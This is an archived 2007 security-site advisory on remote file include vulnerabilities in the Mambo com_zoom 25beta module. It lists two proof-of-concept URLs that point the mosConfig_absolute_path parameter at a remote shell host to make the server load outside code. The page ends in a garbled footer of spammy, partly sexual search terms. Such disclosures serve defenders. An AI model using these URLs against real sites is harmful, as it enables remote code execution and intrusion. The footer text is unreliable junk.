about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Mambo Com-Zoom Module MosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities


Title Mambo Com-Zoom Module MosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities
Published 2007-04-11-12:00AM
Updated 2007-04-12-12:51AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  0o_zeus_o0 and iskorpitx are credited with the discovery of these vulnerabilities.
Vulnerable  MamboXChange com_zoom 25beta
Not Vulnerable  
Code   Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://shell*
http://www.example.com/[path]/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://shell*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 22:30:48 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.thaise Sonal 2...n.com/ VTUNNEL.CO apache2+re apache2.pl www.sexmov www.gayboy Bahar 2...n.com/ ttkandy.51 injected 2 Inglish 2...n.com/ Www.Gadis bolle www.thaise 2...n.com/ ms05-020 indiasexfl 2...n.com/ 33dmw.com axis commu Searching nudes Www.Sexygi oracle vul 2...n.com/ 2...n.com/ indian ido SXE MOVIE sexiy gril 2...n.com/ Free thami www.16lian 2...n.com/ OpenSSH Re wga analysis Trisha sex Koso+kon t242t sania mirz Teen ages 2...n.com/ www.slickb cadc shop596408 ssh server Www.sexyph